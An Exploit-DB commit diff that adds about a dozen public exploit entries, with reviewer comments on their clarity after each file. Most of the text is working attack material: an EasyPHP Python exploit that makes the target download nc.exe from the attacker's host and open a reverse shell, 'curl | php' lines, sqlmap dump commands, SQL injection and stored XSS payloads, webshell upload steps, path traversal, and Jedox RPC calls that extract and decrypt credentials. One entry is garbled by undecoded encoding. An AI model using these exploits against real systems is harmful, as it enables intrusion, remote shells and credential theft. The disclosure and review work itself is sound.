DB: 2023-05-06

20 changes to exploits/shellcodes/ghdb

Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution

Cmaps v8.0 - SQL injection

EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)

File Thingie 2.5.7 - Remote Code Execution (RCE)

Intern Record System v1.0 - SQL Injection (Unauthenticated)
Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
Jedox 2022.4.2 - Code Execution via RPC Interfaces
Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
Jedox 2022.4.2 - Remote Code Execution via Directory Traversal

KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)

Online Pizza Ordering System v1.0 - Unauthenticated File Upload

pluck v4.7.18 - Stored Cross-Site Scripting (XSS)

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)
Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)

Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
Exploit-DB 2023-05-06 00:16:26 +00:00
parent 668314bbda
commit 8945b320b5
20 changed files with 1332 additions and 3 deletions

@ -0,0 +1,35 @@
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]
Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2023-05-03
Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
A Markdown editor & notes app made with Vue & Electron
Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following pay=
load:
<video><source onerror=3D"alert(require('child_process').execSync('/System/=
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
Opening the file in Codigo will auto execute the Calculator application.
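
Review bot: The file is committed with its quoted-printable encoding left undecoded, which garbles the section rules (`=3D=3D=3D`), splits "pay=" / "load" across two lines and cuts the PoC line in the middle of a path (`'/System/=`). Decode the body before committing so the advisory reads as the author wrote it. The header title also says "Arbitrary Code Execution" while the commit message lists this entry as "Remote Code Execution"; pick one, and since the description says the trigger is a user opening a crafted file, state that user interaction is required.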

@ -26,7 +26,7 @@ or exploit latest vulnerabilities in the underlying database.
In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database. In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.
Then run SQLmap to extract the data from the database: Then run SQLmap to extract the data from the database:
sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
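
Review bot: The only change in this hunk is the seed value in `--data` for the `-p "deptType"` command (`deptType=test` becomes `deptType=3`), and nothing in the file says why. A one-line comment that `deptType` is now seeded with the same value the `email` command already uses would make the edit self-explanatory. The context sentence also names 'phone' and 'name' as usable parameters, while the visible lines carry commands for only two of the four; the text should say whether the others are covered elsewhere in the file.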

@ -0,0 +1,48 @@
## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload
## Description:
By using this vulnerability remotely, the malicious pwned_admin can
list and manipulate all files inside the server. This is an absolutely
DANGEROUS and STUPID decision from the application owner! In this
scenario, the attacker prepares the machine for exploitation and sends
a link for remote execution by using the CURL protocol to his
supporter - another attacker. Then and he waits for execution from his
colleague, to mask his action or even more worst than ever. What a
nice hack is this! :)
STATUS: CRITICAL Vulnerability
[+]Exploit:
```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
| php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
| php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)
## Proof and Exploit:
[href](https://streamable.com/98npd0)
## Time spend:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
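
Review bot: The `[+]Exploit` block does not demonstrate what the title claims: `curl -s … | php` downloads the file and runs it in the PHP interpreter on the machine that typed the command, which shows at most that the upload directory hands back `.php` files as source. `## Description` never names the vulnerable feature, the request that stores the file, or what privileges "pwned_admin" holds, so the CRITICAL status cannot be checked from this file, and the reference is to file upload while the title says File-Inclusion. Please replace the commentary with the affected component and preconditions, and clean the footer: `https://cve.mitre.org/index.htmlhttps://cxsecurity.com/` is two URLs fused, and the base64-looking line above the closing signature is mail residue.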

@ -0,0 +1,77 @@
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs: XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)
poc request
POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"
Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--
4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
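
Review bot: The PoC request keeps what looks like a real session value (`Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de`); replace it with a placeholder, and say up front that the upload goes through `admin.php?action=files`, so whoever stores the script is an authenticated admin-panel user. Step 4 requests `files/svg_xss.svg` although the part was uploaded as `filename="SVG_XSS.svg"`; note whether pluck lowercases stored names or fix the path. The section numbering starts at "2." with no section 1. Because the script runs when the file is opened from the application's own origin, a remediation line (serve uploads as attachments or from a separate origin, or sanitise SVG on upload) would be worth adding.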

@ -0,0 +1,18 @@
# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
# Date: 2023-05-02
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wolf-cms.readthedocs.io
# Software Link: https://github.com/wolfcms/wolfcms
# Version: 0.8.3.1
# Tested on: Kali Linux
### Steps to Reproduce ###
# Firstly, go to the "Files" tab.
# Click on the "Create new file" button and create a php file (e.g:
shell.php)
# Then, click on the file you created to edit it.
# Now, enter your shell code and save the file.
# Finally, go to https://localhost/wolfcms/public/shell.php
### There's your shell! ###
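
Review bot: The steps never state the precondition: creating and editing files under the "Files" tab implies a logged-in backend account, and the entry should say which role that is, otherwise the "RCE" label overstates what is shown. The wrapped continuation line `shell.php)` has lost its `#` prefix, unlike every other line in the file. A closing line on mitigation (restricting the file manager to trusted roles, or not executing PHP under `public/`) would be more useful to readers than the final banner.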

@ -0,0 +1,46 @@
# Exploit Title: Cmaps v8.0 - SQL injection
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809
*Description:*
The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```
Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:
```
'-(select*from(select+sleep(2)+from+dual)a)--+
```
The page will sleep for two seconds. This confirms the SQL injection.
*Steps to reproduce:*
1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
## Request to the server:
<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />
## Response from the server:
Look at the response time.
<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
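
Review bot: The two `<img src="Screenshot 2023-04-30 …png">` tags point at local files that are not part of this commit, so the "Request to the server" and "Response from the server" sections carry no evidence; replace them with the request text and the measured response time, or drop the headings. The description hard-codes `192.168.0.56` while the sqlmap line uses `<IP>`; use the placeholder in both. The statement that the dump includes "ldap credentials" is not backed by anything else in the file, and the header mixes a `#` title with `- ` list items, unlike the other entries in this commit.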

@ -0,0 +1,182 @@
# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47879
Introduction
=================
A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"Studio",
"getUserCreds"
]
]
2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker.
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"test_palo",
[
"<HOST>",
"<PORT>",
"",
"",
true,
null
]
]
]
3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user.
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"Studio",
"getExternURI",
[
0,
"",
[
0
],
{
"flag":1
}
]
]
]
4) List all available database connections via `conn::ls`:
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"ls",
[
null,
false,
true,
[
"type",
"active",
"description"
]
]
]
]
5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH: /tc/rpc
METHOD: POST
BODY:
[
[
"com.jedox.etl.mngr.Connections",
"getGlobalConnection",
[
"<CONNECTION>"
]
]
]
6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"common",
"decrypt",
[
"<ENCRYPTEDCREDS>"
]
]
]
7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"common",
"paloGet",
[
null,
"Config",
"#_config",
[
"config"
],
{
"config": [
"<CONFIG>"
]
},
true,
true
]
]
]
8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"palo_mgmt",
"sess_list",
[
null
]
]
]
9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"palo_mgmt",
"lic_users_list",
[
"0"
]
]
]
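
Review bot: Item 5 names the class inconsistently: the prose says `com.jedox.etl.mngr.Connection::getGlobalConnection`, the body sends `"com.jedox.etl.mngr.Connections"`. One of the two is a typo and should be corrected. Item 5 also posts to `/tc/rpc`, which the Introduction does not list (it names only `/be/rpc.php` and `/be/erpc.php`), and item 7 has an unclosed parenthesis after "via CONFIG.". Since every item is an authenticated call, a line on which role was used for testing and on the fixed version would let defenders scope their exposure.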

@ -0,0 +1,28 @@
# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47875
Introduction
=================
A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).
2) Upload a PHP file and note the file system path (`fspath`)
3) Get RCE via Directory Traversal
PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php
METHOD: POST
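
Review bot: Steps 1 and 2 describe the same action (upload a file and read `fspath` from the JSON response) and can be merged. Step 3 gives `METHOD: POST` with no body and a fixed run of five `../` segments without saying which directory the `c` parameter is resolved against, so a reader cannot tell which path check is missing. The `# Version:` line says "and older" but no fixed release is named.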

@ -0,0 +1,34 @@
# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47877
Introduction
=================
A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) Store log entry with XSS payload:
PATH: /ub/ccmd
METHOD: POST
BODY:
[
[
"log",
"error",
"<img src=# onerror=\"alert('XSS')\">"
]
]
2) Trigger XSS payload by opening the Logs page and showing the respective log entry.
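
Review bot: The PoC posts to `/ub/ccmd`, but the Introduction only speaks of "the log module" and never ties that path to it; add one sentence linking the two. The impact depends on who opens the Logs page in step 2, which is not stated. Naming the missing control (output encoding of the log message when the Logs page renders it) would help readers verify a fix.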

@ -0,0 +1,25 @@
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47878
Introduction
=================
Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/.
2) Then any upload/import function can be used to upload a .php webshell file to the webroot.
3) Execute webshell from the webroot directory to obtain RCE.
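
Review bot: This entry has no request or setting name, only a UI description, so it cannot be matched against logs or a configuration audit; name the settings key or the request that changes the default storage path. `/htdocs/app/docroot/` is given as an example web root without saying whether it is the product default. The Introduction calls the flaw "incorrect input validation", so state what validation is expected, for example rejecting paths inside the web root.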

@ -0,0 +1,28 @@
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876
Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(10000)
LOG.error(sout.toString());
LOG.error(serr.toString());
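
Review bot: "A user with appropriate permissions" in step 1 leaves the finding undefined: running Groovy jobs is what Integrator offers, so the entry needs to say which role can create them and why that crosses a privilege boundary. The `# Exploit Author:` line is formatted differently from the sibling Jedox files in this commit ("Syslifters - Christoph Mahrl, …" against "Team Syslifters / Christoph MAHRL, …"). The script reports command output through `LOG.error`, which produces error-level log entries; that deserves a comment for anyone reproducing this on a monitored test system.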

@ -0,0 +1,56 @@
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874
Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"ls",
[
null,
false,
true,
[
"type",
"active",
"description"
]
]
]
]
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH: /tc/rpc
METHOD: POST
BODY:
[
[
"com.jedox.etl.mngr.Connections",
"getGlobalConnection",
[
"<CONNECTION>"
]
]
]
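
Review bot: Step 2 has the same class-name mismatch as the CVE-2022-47879 file: the prose says `com.jedox.etl.mngr.Connection::getGlobalConnection`, the body sends `"com.jedox.etl.mngr.Connections"`, and the Introduction uses the plural form. Both steps repeat items 4 and 5 of that file, so step 1 could be reduced to the cross-reference its heading already carries. The Introduction says the attacker must know the connection name, yet step 1 lists the names, so that precondition should be reworded.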

@ -0,0 +1,25 @@
# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47880
Introduction
=================
An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control.
2) Test the database connection.
3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.
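
Review bot: The Introduction places the flaw in `/be/rpc.php`, but the PoC is three UI steps with no request, so the claim cannot be tied to that endpoint from this file. "With the appropriate permissions" should name the permission, since changing a connection's host is an administrative action. Step 3 does not say which connection types send the credentials in a form that can be read from a capture.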

@ -0,0 +1,116 @@
# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and
Path Traversal)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-06
# Vendor Homepage: https://www.easyphp.org/
# Software Link : https://www.easyphp.org/
# Tested Version: 14.1
# Tested on: Windows 7 and 10
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Vulnerability description: There is an OS Command Injection in EasyPHP
Webserver 14.1 that allows an attacker to achieve Remote Code Execution
(RCE) with administrative privileges.
Proof of concept:
To detect:
POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://127.0.0.1:10000
Connection: keep-alive
Referer: http://127.0.0.1:10000/index.php?zone=settings
Host: 127.0.0.1:10000
app_service_control=calc.exe
The calculator opens.
Exploit:
# !/usr/bin/python3
import requests
import sys
if len(sys.argv) != 5:
print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %
sys.argv[0])
print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" %
sys.argv[0])
exit(1)
else:
target = sys.argv[1]
targetport = sys.argv[2]
localip = sys.argv[3]
localport = sys.argv[4]
# python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in
the directory
payload =
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
+ localip + ':8000' +
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
+ localip + "+" + localport + "+-e+cmd.exe\""
print (payload)
url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
}
data = {'app_service_control':payload}
try:
r = requests.post(url, headers=headers, data=data)
except requests.exceptions.ReadTimeout:
print("The payload has been sent. Check it!")
pass
# Vulnerability Type: Path Traversal
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-22
Vulnerability description: An issue was discovered in EasyPHP Webserver
14.1. An Absolute Path Traversal vulnerability in / allows remote users to
bypass intended SecurityManager restrictions and download any file if you
have adequate permissions outside the documentroot configured on the server.
Proof of concept:
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
HTTP/1.1
Host: 192.168.X.X:10000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
HTTP/1.1 200 OK
Host: 192.168.X.X:10000
Connection: close
Content-Type: application/octet-stream
Content-Length: 499
; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
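
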